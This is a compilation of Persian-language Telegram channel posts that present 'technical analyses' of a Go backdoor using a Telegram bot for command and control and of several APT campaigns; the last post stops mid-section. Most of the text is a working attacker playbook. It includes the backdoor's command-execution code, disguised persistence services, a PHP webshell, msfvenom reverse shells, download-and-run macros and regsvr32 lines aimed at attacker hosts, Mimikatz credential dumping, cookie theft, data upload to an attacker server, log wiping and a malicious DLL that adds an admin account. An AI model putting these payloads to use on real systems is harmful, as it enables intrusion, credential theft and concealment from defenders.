⏲ تحلیل استفاده بکدور جدید مبتنی بر Go از API ربات تلگرام برای عملیات پنهانی با C2 (قسمت اول)

تو چن روز گذشته، محققای امنیت سایبری یه بکدور جدید مبتنی بر زبان برنامه‌نویسی Go (Golang) رو شناسایی کردن که از API ربات تلگرام برای برقراری ارتباطاتC2 استفاده می‌کنه. تو این پست می‌خوایم کمی این مورد رو بررسی فنی‌تر انجام بدیم که این تحلیل شامل راه‌اندازی سرور C2 با استفاده از تلگرام، روش‌های دور زدن شناسایی، و ابزارهای مورد استفاده تو این حمله‌اس.

🔹 یک. راه‌اندازی سرور C2 با استفاده از تلگرام
برای استفاده از API تلگرام به عنوان مرکز C2، باید مراحل زیر رو طی کنیم:
👈 مرحله ۱: ایجاد یک ربات تلگرام
⬅️ الف. به تلگرام رفته و @BotFather رو جستجو کنین.
⬅️ ب. دستور /newbot رو ارسال کنین.
⬅️ ج. نام و نام کاربری ربات رو تنظیم کنین.
⬅️ د. توکن دریافت‌شده رو ذخیره کنین. این توکن برای برقراری ارتباط استفاده می‌شه.
👈 مرحله ۲: دریافت و ارسال دستورات با Golang
برای تعامل با API تلگرام، از لایبرری github.com/go-telegram-bot-api/telegram-bot-api استفاده می‌کنیم.
نمونه کد برای دریافت دستورات از تلگرام و اجرای اونا تو سیستم قربانی:

package main

import (
    "log"
    "os/exec"
    "github.com/go-telegram-bot-api/telegram-bot-api"
)

func main() {
    bot, err := tgbotapi.NewBotAPI("YOUR_BOT_TOKEN")
    if err != nil {
        log.Fatal(err)
    }

    u := tgbotapi.NewUpdate(0)
    u.Timeout = 60
    updates, err := bot.GetUpdatesChan(u)

    for update := range updates {
        if update.Message == nil {
            continue
        }

        cmd := update.Message.Text
        output, err := exec.Command("sh", "-c", cmd).Output()
        if err != nil {
            output = []byte(err.Error())
        }

        msg := tgbotapi.NewMessage(update.Message.Chat.ID, string(output))
        bot.Send(msg)
    }
}

این کد پیام‌های دریافتی از ربات تلگرام رو پردازش می‌کنه. هر پیام به عنوان یه دستور سیستم اجرا شده و خروجی اون به مهاجم ارسال می‌شه.

🔹 دو. پنهان‌سازی و جلوگیری از شناسایی
برای افزایش شانس اجرای موفقیت‌آمیز، چندین تکنیک دور زدن شناسایی به کار گرفته می‌شه.
👈 الف) مبهم‌سازی کد (Obfuscation)
⬅️ ابزار garble برای مبهم‌سازی باینری Golang

GOOS=linux GOARCH=amd64 garble -literals build -o payload obfuscated.go

👈 ب) اجرای بدافزار به صورت سرویس مخفی
⬅️ تبدیل بدافزار به یه سرویس پس‌زمینه تو لینوکس:

cp payload /usr/bin/systemd-networkd
chmod +x /usr/bin/systemd-networkd
echo '[Service]
ExecStart=/usr/bin/systemd-networkd
Restart=always' > /etc/systemd/system/networkd.service
systemctl enable networkd
systemctl start networkd

تو ویندوز، می‌شه از schtasks برای ایجاد یه تسک مخفی استفاده کرد:

schtasks /create /tn "WindowsUpdate" /tr "C:\Users\Public\malware.exe" /sc onlogon /ru SYSTEM /f

🔹 سه. استفاده از ngrok برای دسترسی مستقیم
وقتی که نمی‌شه از تلگرام استفاده کرد، ngrok یه راه ارتباطی امن برای C2 فراهم می‌کنه.
👈 نصب ngrok

wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
./ngrok authtoken YOUR_AUTH_TOKEN

👈 ایجاد یه تانل مخفی برای ارتباط با بکدور:

./ngrok tcp 4444

بعد از اجرای این دستور، ngrok یک آدرس tcp:// ایجاد می‌کنه که مهاجم می‌تونه برای ارتباط استفاده کنه.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ تحلیل استفاده بکدور جدید مبتنی بر Go از API ربات تلگرام برای عملیات پنهانی با C2 (قسمت دوم)

🔹 چهار. پیلودها و اکسپلویت‌های مورد استفاده
👈 الف) اکسپلویت RCE
اگه دسترسی به سرور قربانی از طریق آسیب‌پذیری‌های تحت وب ممکن باشه، می‌شه یه webshell مستقر کرد:

<?php echo shell_exec($_GET['cmd']); ?>

این شل رو می‌شه با curl استفاده کرد:

curl "http://victim.com/shell.php?cmd=whoami"

👈 ب) سرریز بافر تو سرویس‌های ناامن
اگه سرویس‌های آسیب‌پذیر به سرریز بافر پیدا بشن، می‌شه از ابزار msfvenom برای ساخت پیلود استفاده کرد:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=your-ip LPORT=4444 -f elf > payload.elf

و بعدش اونو تو سیستم هدف اجرا کرد:

chmod +x payload.elf
./payload.elf

🔹 پنج. نکات امنیتی برای جلوگیری از شناسایی و کشف
👈 الف) استفاده از رمزگذاری برای ارتباطات
برای جلوگیری از شناسایی، می‌شه از AES برای رمزگذاری ارتباطات استفاده کرد. نمونه کد رمزگذاری و رمزگشایی:

import (
    "crypto/aes"
    "crypto/cipher"
    "encoding/hex"
)

func encrypt(data, key string) string {
    block, _ := aes.NewCipher([]byte(key))
    ciphertext := make([]byte, len(data))
    stream := cipher.NewCTR(block, make([]byte, aes.BlockSize))
    stream.XORKeyStream(ciphertext, []byte(data))
    return hex.EncodeToString(ciphertext)
}

func decrypt(data, key string) string {
    ciphertext, _ := hex.DecodeString(data)
    block, _ := aes.NewCipher([]byte(key))
    plaintext := make([]byte, len(ciphertext))
    stream := cipher.NewCTR(block, make([]byte, aes.BlockSize))
    stream.XORKeyStream(plaintext, ciphertext)
    return string(plaintext)
}

👈 ب) استفاده از اجرای مخفی تو ویندوز
برای اجرای مخفی تو ویندوز، می‌شه از regsvr32 استفاده کرد:

regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll

این دستور باعث اجرای کد مخرب از طریق COM بدون ایجاد پردازش مشهود می‌شه.

🔹 نتیجه‌گیری
⬅️ استفاده از تلگرام به عنوان C2 راهی برای پنهان‌سازی ارتباطات بدافزاره.
⬅️ گولنگ به دلیل قابل حمل بودن و سختی دی‌کامپایل شدن، گزینه‌ای محبوب برای توسعه‌دهنده‌های بدافزار شده.
⬅️ استفاده از ngrok، msfvenom، و AES در کنار روش‌های مبهم‌سازی، شانس شناسایی و کشف رو کاهش می‌ده.

⚠️ نکته: این مقاله صرفاً برای اهداف آموزشی و امنیتی نوشته شده است. مسئولیت استفاده نادرست از این اطلاعات بر عهده کاربر خواهد بود.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ تحلیل حمله Silver Fox APT با بدافزار Winos 4.0 علیه سازمان‌های تایوانی - قسمت اول

گروه Silver Fox APT از بدافزار Winos 4.0 برای نفوذ و کنترل سازمان‌های تایوانی استفاده کرده. تو این گزارش، حمله رو از دیدگاه فنی بررسی می‌کنیم و ابزارها، تکنیک‌ها، کدهای مخرب و روش‌های استفاده‌شده رو تحلیل می‌کنیم.

🔹 مرحله ۱: شناسایی هدف
👈 ابزارهای شناسایی استفاده‌شده
⬅️ ابزار theHarvester – جمع‌آوری ایمیل‌های کارکنان از منابع عمومی:

theHarvester -d targetcompany.com -l 500 -b google

⬅️ ابزار Shodan – اسکن سرورها و سرویس‌های باز:

shodan search "port:3389 country:TW"

⬅️ ابزار Maltego – تحلیل ارتباطات کارکنان از شبکه‌های اجتماعی.
🔵خروجی این مرحله: لیست ایمیل‌های کارکنان، سرورهای آسیب‌پذیر، ارتباطات سازمانی.

🔹 مرحله ۲: نفوذ اولیه
👈 روش‌های نفوذ
⬅️ یک. حمله فیشینگ با اسناد آلوده: هکرها ایمیل‌های فیک با فایل‌های Word حاوی ماکرو مخرب رو ارسال می‌کردن.
کد VBA مخرب تو فایل Word برای دانلود بدافزار Winos 4.0:

Sub AutoOpen()
    Dim objShell As Object
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand <کد_پایه64>"
End Sub

⬅️ دو. اکسپلویت آسیب‌پذیری‌های زیرودی
هکرها از CVE-2024-20700 (آسیب‌پذیری RCE تو ویندوز) برای اجرای کد از راه دور استفاده کردن.
تست آسیب‌پذیری با Metasploit:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target_ip
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

⬅️ سه. حمله به پروتکل RDP با Brute Force
استفاده از Hydra برای پیدا کردن پسوردهای ضعیف RDP

hydra -L user_list.txt -P password_list.txt rdp://target_ip

🔵خروجی این مرحله: دسترسی اولیه به سیستم هدف.

🔹 مرحله ۳: نصب بدافزار Winos 4.0
👈 ویژگی‌های Winos 4.0
⬅️ اجرای مخفیانه به‌عنوان پردازش سیستم
⬅️ مخفی‌سازی با استفاده از تکنیک Process Hollowing
⬅️ ایجاد ارتباط با سرور C2 از طریق HTTP و DNS Tunneling
کد Winos 4.0 برای ایجاد ارتباط با سرور هکرها:

#include <windows.h>
#include <wininet.h>

int main() {
    HINTERNET hInternet, hConnect;
    hInternet = InternetOpen("Winos", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    hConnect = InternetOpenUrl(hInternet, "http://attacker.com/payload.exe", NULL, 0, INTERNET_FLAG_RELOAD, 0);
    if (hConnect) {
        // دانلود و اجرای بدافزار اصلی
    }
    InternetCloseHandle(hConnect);
    InternetCloseHandle(hInternet);
    return 0;
}

⬅️ تکنیک Process Hollowing برای مخفی‌سازی بدافزار:

HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, target_pid);
LPVOID pRemoteCode = VirtualAllocEx(hProcess, NULL, payload_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, pRemoteCode, payload, payload_size, NULL);
CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);

⬅️ ساخت Payload مخرب با Metasploit:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe > winos4.exe

🔵خروجی این مرحله: اجرای Winos 4.0 روی سیستم قربانی.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ کانال Try Hack Box یه پستی گذاشت مربوط به آسیب پذیری با شناسه CVE-2025-21333 که به نظرم تحلیلش می‌تونه جالب باشه.

آسیب‌پذیری با شناسه CVE-2025-21333، یه آسیب‌پذیری افزایش سطح دسترسی (LPE) تو درایور vkrnlintvsp.sysه که مربوطه به Hyper-V تو ویندوز. این نقص به دلیل یه Heap Overflow ایجاد شده که به هکر لوکال احراز هویت‌شده اجازه می‌ده کنترل کامل حافظه کرنل رو در اختیارش بگیره و در نهایت به سطح دسترسی SYSTEM دست پیدا کنه.
✅ سطح تهدید: بالا
✅ سیستم‌های آسیب‌پذیر: ویندوز سرور و کلاینتی که از Hyper-V استفاده می‌کنن
✅ دلیل بهره‌برداری: عدم بررسی کافی تو مدیریت حافظه توکرنل

🔹 یک. مشکل اصلی کجاست؟
درایور vkrnlintvsp.sys که بخشی از Hyper-Vه، وظیفه پردازش درخواست‌های خاصی رو از ماشین‌های مجازی داره. هکر می‌تونه با ارسال یک درخواست IOCTL خاص به این درایور، باعث شه که کرنل حافظه بیشتری از حد مجاز تو هیپ، اختصاص بده، اما بدون بررسی مقدار واقعی داده‌ای که تو اون نوشته می‌شه. این یعنی:
⬅️ عدم بررسی طول داده ورودی: مهاجم می‌تونه داده‌ای بزرگ‌تر از حافظه اختصاص‌یافته ارسال کنه.
⬅️ سرریز تو حافظه هیپ: داده‌های اضافه تو ساختارهای مجاور تو حافظه بازنویسی می‌شن.
⬅️ امکان کنترل کرنل: با جایگزینی Pointers یا Function Pointers، مهاجم می‌تونه کنترل اجرای کد رو به دست بگیره.

🔹 دو. سواستفاده از سرریز هیپ
سرریز تو هیپ خطرناک‌تر از استکه، چرا که اگه بشه جداول تخصیص حافظه رو دستکاری کرد، می‌شه به طور دلخواه حافظه خواند/نوشت و به کرنل حمله کرد.
مهاجم برای سواستفاده از این نقص می‌تونه:
⬅️ از Grooming Heap (چیدمان خاص حافظه قبل از حمله) استفاده کنه تا داده‌های خودش رو تو یه منطقه حساس از حافظه قرار بده.
⬅️ با بهره‌گیری از Fake Object Injection، اشاره‌گرها یا مقادیر مهم تو کرنل رو تغییر بده.
⬅️ و در نهایت، از ROP (Return-Oriented Programming) یا Shellcode Injection برای اجرای کد دلخواه تو سطح کرنل استفاده کنه.

🔹 تو لینکی که بالا ارجاع دادم PoC مربوط به این آسیب‌پذیری قرار داده شده می‌تونین مطالعه کنین.

🔹 سه. نحوه جلوگیری و راهکارهای دفاعی
⬅️ آپدیت ویندوز: مایکروسافت تو ژانویه ۲۰۲۵ این مشکل رو از طریق انتشار پچ برطرف کرده.
⬅️ محدود کردن دسترسی کاربرای لوکال: فقط کاربرای خاص باید دسترسی به درایورهای کرنل داشته باشن.
⬅️ مانیتورینگ درخواست‌های IOCTL: استفاده از EDR (Endpoint Detection & Response) برای شناسایی درخواست‌های مشکوک.
⬅️ استفاده از HVCI (Hypervisor-Enforced Code Integrity): این فیچر تو ویندوز از اجرای کدهای ناشناس تو کرنل جلوگیری می‌کنه.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ تحلیل حمله Silver Fox APT با بدافزار Winos 4.0 علیه سازمان‌های تایوانی - قسمت دوم

🔹 مرحله ۴: سرقت اطلاعات و حرکت جانبی
👈 سرقت اطلاعات
⬅️ استفاده از Mimikatz برای استخراج هش‌های NTLM:

mimikatz
privilege::debug
sekurlsa::logonpasswords

⬅️ دزدیدن کوکی‌های احراز هویت مرورگر:

sqlite3 ~/.mozilla/firefox/*.default/cookies.sqlite "SELECT host, name, value FROM moz_cookies"

⬅️ جمع‌آوری اطلاعات با PowerShell:

Get-ChildItem -Path C:\Users\ -Recurse -Filter *.docx,*.xlsx,*.pdf

👈 حرکت جانبی تو شبکه
⬅️ پیدا کردن سیستم‌های دیگه تو شبکه با BloodHound:

neo4j console
bloodhound-python -u admin -p password -d targetcompany.com --collect all

⬅️ انتقال بدافزار به سایر سیستم‌ها با PsExec:

psexec \\targetpc -u Admin -p Password -i C:\Users\Public\winos4.exe

🔹 مرحله ۵: ارتباط با سرور C2 و ارسال اطلاعات
⬅️ استفاده از DNS Tunneling برای ارسال اطلاعات بدون شناسایی:

dnscat2 --dns targetcompany.com

⬅️ آپلود اطلاعات به سرور هکر با PowerShell:

$webclient = New-Object System.Net.WebClient
$webclient.UploadFile("http://attacker.com/upload", "C:\Users\Public\secrets.zip")

🔵خروجی این مرحله: ارسال داده‌های حساس به سرور هکر.

🔹 مرحله ۶: حذف ردپاها و خروج از سیستم
⬅️ حذف لاگ‌های ویندوز:

wevtutil cl System
wevtutil cl Security
wevtutil cl Application

⬅️ پاک‌سازی هیستوری اجرا تو PowerShell:

Remove-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

🔵خروجی این مرحله: مخفی‌سازی ردپای حمله و خروج از سیستم بدون شناسایی.

🔹 راه‌های دفاعی پیشنهادی
⬅️ فعال‌سازی MFA برای اکانت‌های حساس
⬅️ نظارت روی ترافیک شبکه برای تشخیص ارتباطات C2
⬅️ اجرای آپدیت‌های امنیتی و پچ‌های آسیب‌پذیری‌های موجود
⬅️ مانیتورینگ دقیق سیستم‌ها با ابزارهای EDR/XDR برای شناسایی فعالیت‌های مشکوک

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ تحلیل فنی حمله Lotus Panda با Sagerunex Backdoor

گروه Lotus Panda یکی از گروه‌های APT چینیه که با استفاده از نسخه‌ آپدیت شده‌ Sagerunex Backdoor به هدف‌هایی تو حوزه‌ دولت، مخابرات و صنایع حساس حمله کرده. این گروه از تکنیک‌های پیشرفته نفوذ، بایپس مکانیزم‌های امنیتی، و افزایش سطح دسترسی تو تارگت بهره می‌بره.

🔹 مرحله 1. شناسایی تارگت و جمع‌آوری اطلاعات اولیه
👈 تکنیک‌های شناسایی اولیه (OSINT)
⬅️ شناسایی دامنه‌ها و ایمیل‌های مرتبط با تارگت

theHarvester -d target.com -l 500 -b google

⬅️ بررسی پورت‌ها و سرویس‌های در حال اجرا

nmap -sS -sV -p- -T4 target.com

⬅️ جستجو برای آسیب‌پذیری‌های احتمالی تو سیستم‌ها

shodan search "port:443 org:TargetOrganization"

🔹 مرحله 2. روش‌های نفوذ اولیه به تارگت
👈 حمله‌ Spear Phishing

Asunto: Actualización de seguridad obligatoria

Estimado usuario,

Hemos detectado una actividad sospechosa en su cuenta. Para verificar su información, descargue el archivo adjunto.

Atentamente,
Soporte Técnico

🔹 مرحله 3. اجرای بدافزار و استقرار Sagerunex
👈 کد PowerShell برای دانلود و اجرای بدافزار:

Invoke-WebRequest -Uri "http://maliciousserver.com/sagerunex.exe" -OutFile "C:\Users\Public\sagerunex.exe"
Start-Process "C:\Users\Public\sagerunex.exe"

🔹 مرحله 4. برقراری ارتباط با سرور C2
👈 کد ارتباط با C2 از طریق Dropbox API

import dropbox

ACCESS_TOKEN = "malicious-access-token"
dbx = dropbox.Dropbox(ACCESS_TOKEN)

def send_data(data):
    dbx.files_upload(data.encode(), "/logs/data.txt")

send_data("Captured keystrokes and files")

🔹 مرحله 5. افزایش سطح دسترسی و حرکت جانبی تو شبکه
👈 الف) افزایش سطح دسترسی با اجرای اکسپلویت‌های Local Privilege Escalation

winPEAS.bat > report.txt

👈 ب) اجرای DLL Hijacking برای افزایش سطح دسترسی
کد ساخت یک DLL مخرب تو C++

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        system("cmd /c net user hacker P@ssw0rd! /add && net localgroup administrators hacker /add");
    }
    return TRUE;
}

⬅️ کامپایل و ایجاد DLL مخرب:

x86_64-w64-mingw32-gcc -shared -o fake.dll fake.cpp -mwindows

🔹 مرحله 6. استخراج اطلاعات و حذف ردپا
👈 الف) فشرده‌سازی و رمزگذاری داده‌ها برای ارسال به C2

Compress-Archive -Path "C:\sensitive-data" -DestinationPath "C:\data.zip"
certutil -encode "C:\data.zip" "C:\data.b64"

👈 ب) حذف ردپاها و لاگ‌های ویندوز

Remove-Item -Path "C:\Users\Public\sagerunex.exe" -Force
wevtutil cl Security

🔹 راه‌کارهای دفاعی که توسط رضا ارائه شده رو حتما بخونین. جالبه:
https://news.1rj.ru/str/safe_defense/136

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ خبری اومده که حملات سایبری که اخیرا تو ژاپن انجام شده، نشون‌دهنده بهره‌برداری از آسیب‌پذیری زیرودی با شناسه CVE-2025-0282 تو دستگاه‌های Ivanti Connect Secure (ICS) برای توزیع بدافزار جدید به اسم DslogdRAT هست. کخ تو این پست می‌خوایم یکم فنی‌تر این خبر رو باهم بررسی کنیم.

این آسیب‌پذیری یه stack-based buffer overflow تو نسخه‌های قبل از 22.7R2.5 از Ivanti Connect Secureه که به مهاجمای سایبری اجازه می‌ده بدون احراز هویت، کد دلخواه‌شون رو بصورت ریموت اجرا کنن. این نقص تو دسامبر 2024 شناسایی و تو ژانویه 2025 پچ شد، اما قبل از اون تو حملاتی علیه سازمان‌های ژاپنی مورد سوءاستفاده قرار گرفته بود.
​
تحلیل فنی:
🔹 یک. شناسایی هدف (Recon)
اولین قدم اینه که بفهمیم چه سازمان‌هایی هنوز از نسخه‌های آسیب‌پذیر Ivanti Connect Secure (ICS) استفاده می‌کنن. اسکنرهایی مثل Shodan یا Censys برای این کار عالی هستن. با یه فیلتر ساده روی بنرهای SSL یا مسیرهای /dana-na/ راحت سرورهای ICS پیدا میشن.

http.noscript:"Welcome to Ivanti Connect Secure"

🔹 دو. شناسایی آسیب‌پذیری (Enumeration)
وقتی سرورهای هدف پیدا شدن، تست می‌کنیم ببینم نسخه‌ی ICS آسیب‌پذیره یا نه. چون این آسیب‌پذیری یه stack-based buffer overflow توی یکی از کامپوننت‌های مدیریت حافظه‌ی ICS هست، معمولاً با یه درخواست ساده میشه کرش یا رفتار غیرعادی تو سرور ایجاد کرد.

curl -k -X POST https://victim-ics/dana-na/auth/url_default/login.cgi -d "reallylonginput=AAAAAA...."

اگر رفتار عجیبی دیدیم، سرور به احتمال زیاد آسیب‌پذیره.

🔹 سه. اکسپلویت (Exploit)
وقتی مطمئن شدیم سیستم هدف آسیب‌پذیره، باید shell اولیه بگیریم. با توجه به اطلاعات لو رفته، اکثر هکرها از یه Perl Webshell ساده استفاده کردن که روی ICS دیپلوی شده. این Webshell با یک کوکی خاص فعال میشه.
⬅️ ساخت درخواست فعالسازی Webshell:

curl -k --cookie "DSLogdSession=xyz" https://victim-ics/home/webserver/htdocs/dana-na/cc/ccupdate.cgi?cmd=whoami

اگر جواب گرفتیم (مثلاً root یا admin)، یعنی کامل داخل سیستم هستیم.

🔹 چهار. استقرار بدافزار (Post-Exploitation)
حالا نوبت به نصب DslogdRAT می‌رسه که یه رت سبکه که از ارتباط رمزگذاری شده XOR استفاده می‌کنه. این رت فوق‌العاده باهوشه؛ فعالیتش فقط بین ساعات اداری (8 صبح تا 2 بعدازظهر) هست تا وسط شب آلارم ایجاد نکنه.
هش مربوط به این رت:
1dd64c00f061425d484dd67b359ad99df533aa430632c55fa7e7617b55dab6a8
مراحل بعدی:
⬅️ این رت رو از سرور خودمون روی سرور قربانی آپلود می‌کنیم.
⬅️ ارتباط با C2 برقرار میشه.
⬅️ دستورات مستقیم می‌فرستیم یا فایل‌ها رو منتقل می‌کنیم.

🔹 پنج. ماندگاری (Persistence)
برای اینکه دسترسی طولانی داشته باشیم:
⬅️ اسکریپت بوت روی ICS نصب می‌کنیم که با هر ریبوت، Webshell یا DslogdRAT دوباره فعال بشه.
⬅️ همچنین می‌تونیم یه کاربر Admin جعلی درست کنیم که توی لیست کاربرها زیاد تو چشم نیاد.

🔹 شش. حرکت جانبی و حمله‌های بعدی (Lateral Movement)
از ICS به عنوان یک pivot point استفاده می‌کنیم:
⬅️ ارتباط به شبکه داخلی سازمان.
⬅️ سرقت کردنشیال‌های LDAP یا Active Directory.
⬅️ اسکن برای سرورهای دیگر.
⬅️ کاشت بدافزار در شبکه‌های حساس‌تر.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ تحلیل حمله گروه UNC2428 (وابسته به ایران) علیه اهداف اسرائیلی

تو آوریل ۲۰۲۵ (که امروز آخرین روزش هم هست)، گروهی از هکرهایی که گفته وابسته به ایران هستند با نام UNC2428، یه کمپین پیچیده‌ی مهندسی اجتماعی رو علیه اهداف اسرائیلی اجرا کردن. این عملیات با استفاده از آگهی‌های شغلی جعلی به نام شرکت دفاعی اسرائیلی «رافائل» انجام شده و بدافزاری به نام MURKYTOUR رو توزیع کرده. که تو ادامه می‌خوایم این حمله رو کمی تحلیل کنیم.

🔹 یک. شناسایی اهداف (Reconnaissance)
👈 تکنیک‌های به‌کاررفته:
⬅️ استفاده Passive OSINT از LinkedIn، GitHub، و Telegram
⬅️ غربال‌گری افراد با علایق شغلی فعال (جستجوی کلمات کلیدی مثل “Looking for opportunities”)
⬅️ فیلتر افراد مرتبط با شرکت‌های حساس (مثلاً Rafael Defense Systems)
👈 ابزارهای احتمالی:
⬅️ یک. Maltego، SpiderFoot، recon-ng
⬅️ دو. Custom scrapers (برای LinkedIn و صفحات استخدامی)

🔹 دو. ساخت زیرساخت فیشینگ (Infrastructure)
👈 دامنه جعلی:
⬅️ دامنه rafael-careers[.]com یا مشابه اون
⬅️ ثبت از طریق خدمات ناشناس (Namecheap + Whois Privacy)
👈 طراحی وب‌سایت:
⬅️ شبیه‌سازی دقیق صفحه رسمی شرکت
⬅️ اضافه کردن فرم بارگذاری رزومه (رزومه در واقع نقش trigger برای نصب بدافزار رو ایفا می‌کنه)
👈 گواهی SSL:
⬅️ صادرشده از Let’s Encrypt
⬅️ مرورگر قربانی خطری احساس نمی‌کنه (https فعال)

🔹 سه. طراحی Dropper (LONEFLEET)
👈 نوع فایل:
⬅️ فایل اجرایی ویندوز با اسمی مثل RafaelConnect.exe
⬅️ دولوپ شده با C# یا Visual Basic .NET
👈 رفتار Dropper:
نمایش فرم GUI فیک برای پرکردن اطلاعات شغلی
اجرا شدن ماژول بدافزاری تو بک‌گراند
انجام Persistence از طریق Scheduled Task و Registry: Run
👈 تکنیک‌های ضدتحلیل:
⬅️ بررسی پردازش‌های تحلیل رایج (vboxservice، wireshark، procmon)
⬅️ اجرای تأخیری (Sleep + Interaction Check)
⬅️ تشخیص وجود موس یا کلیک برای جلوگیری از اجرا تو sandbox

🔹 چهار. بدافزار اصلی (MURKYTOUR)
👈 زبان و ساختار:
⬅️ دولوپ شده بر پایه .NET یا C++
⬅️ ساختار ماژولار
👈 عملکردها:
⬅️ اجرای دستورات PowerShell
⬅️ کی‌لاگر و اسکرین‌شات
⬅️ استخراج فایل‌ها و session tokens
⬅️ ایجاد کانال C2 با استفاده از HTTPS جعلی یا DNS tunneling
👈 روش ارتباط با C2:
⬅️ استفاده از دامنه جعلی مانند cdn-sync-update[.]com
⬅️ استفاده از TLS سفارشی یا reverse proxy برای پنهون کردن ترافیک

🔹 پنج. مکانیزم‌های جلوگیری از شناسایی (Evasion Techniques)
⬅️ یک. Obfuscation: فشرده‌سازی و کدگذاری فایل اجرایی (مثلاً با ConfuserEx)
⬅️ دو. AV Bypass: امضای دیجیتال نامعتبر + امتناع از استفاده از APIهای مشکوک
⬅️ سه. Living Off The Land (LOTL): استفاده از ابزارهای داخلی ویندوز (rundll32, powershell, mshta)

🔹 شش. استخراج اطلاعات (Exfiltration)
⬅️ استفاده از HTTPS POST برای ارسال اطلاعات حساس
⬅️ چنل فشرده‌شده با gzip و disguise به عنوان ترافیک وب
⬅️ انتقال فایل‌ها به صورت chunk شده

🔹 هفت. حفظ دسترسی (Persistence)
⬅️ یک. HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateSvc
⬅️ دو. Scheduled Task با نام جعلی: “Windows Defender Scheduler”
⬅️ سه. ایجاد بکدور دوم به صورت PowerShell noscript تو پوشه %AppData%

🔹 هشت. اقدامات ضد تحلیل (OPSEC)
⬅️ ارتباط دوره‌ای با C2، نه دائم
⬅️ استفاده از beacon time تصادفی (Random jitter)
⬅️ حذف خودکار فایل‌های dump و log بعد از نصب

🔹 نه. خطاهای احتمالی مهاجم
⬅️ ارسال فایل اجرایی قابل تحلیل (.exe) بدون لایه dropper دوم می‌تونه تو sandbox بررسی بشه.
⬅️ شباهت دامنه جعلی به دامنه واقعی ممکنه با بررسی DNS یا threat intel شناسایی بشه.
⬅️ استفاده از TLS سلف سیگنیچر تو برخی کانفیگ‌ها می‌تونه ردفلگ باشه.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ تحلیل فنی نفوذ APT1 به Westinghouse Electric Company

گروه APT1 یکی از شناخته‌شده‌ترین گروه‌های هکریه که توسط دولت چین پشتیبانی می‌شه. این گروه توسط گزارش مشهور شرکت Mandiant تو سال ۲۰۱۳ افشا شد و به متهم شد به حملات سایبری متعدد علیه سازمان‌های غربی. یکی از این شرکت‌ها Westinghouse Electric Company بود. دلیل این انتخاب اینه که این شرکت یکی از شرکت‌های کلیدی تو طراحی، ساخت، و راه‌اندازی نیروگاه‌های هسته‌ای تو آمریکاست و همچنین تکنولوژی هسته‌ای به کشورهای دیگر (مثل کره جنوبی و ژاپن) صادر می‌کرد. درحقیقت اومدن این شرکت رو هک کردن تا بتونن به اسناد تجاری و تکنولوژی این شرکت دست پیدا کنن. خب می‌ریم سروقت تحلیل‌مون:

🔹 فاز نفوذ اولیه (Initial Access)
👈 تکنیک مورد استفاده: Spear Phishing هدفمند با فایل‌های آفیس (Word/Excel) حاوی ماکرو مخرب
محتوای فایل:
⬅️ فایل Word با عنوان گول‌زننده مثل: Project_Timeline_Q3_Confidential.doc
⬅️ فعال‌سازی ماکرو با پیام: “Enable Content to view document”
⬅️ کد VBA برای Drop و اجرای Payload
نمونه کد ماکرو VBA:

Sub AutoOpen()
  Dim objShell As Object
  Set objShell = CreateObject("WScript.Shell")
  objShell.Run "powershell -w hidden -nop -c IEX(New-Object Net.WebClient).DownloadString('http://203.81.99.37/payload.ps1')"
End Sub

👈 تحلیل:
⬅️ یک. -w hidden: اجرای مخفی PowerShell
⬅️ دو. -nop -c: حذف history و اجرای مستقیم
⬅️ سه. دانلود و اجرای فایل رمزگذاری‌شده از C2

🔹 نصب بکدور و حفظ دسترسی (Establish Foothold)
👈 ابزار: WEBC2 (APT1 toolset)
⬅️ یک. تروجان HTTP-based برای اتصال به سرور فرماندهی (C2)
⬅️ دو. دراپ به مسیر‌هایی مثل: C:\Users\Public\chrome_upd.exe
👈 مشخصات فایل دراپر:
⬅️ یک. Obfuscated with UPX or custom packer
⬅️ دو. C2 address hardcoded or DNS-resolved from DGA
نمونه رفتار فرآیند:

Start-Process -FilePath "chrome_upd.exe" -ArgumentList "/silent /task:sync" -WindowStyle Hidden

👈 ترافیک شبکه:
⬅️ یک. POST request every 30s to http://updater[.]info/report.php
⬅️ دو. Beacon: Base64-encoded system fingerprint

🔹 حرکت جانبی (Lateral Movement)
👈 ابزار: PsExec + Mimikatz
Mimikatz:

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

PsExec:
psexec.exe \\TARGET -u admin -p password cmd.exe

🔹 جستجو و استخراج اطلاعات (Data Collection & Exfiltration)
👈 ابزار: اسکریپت‌های سفارشی PowerShell + RAR
نمونه اسکریپت:

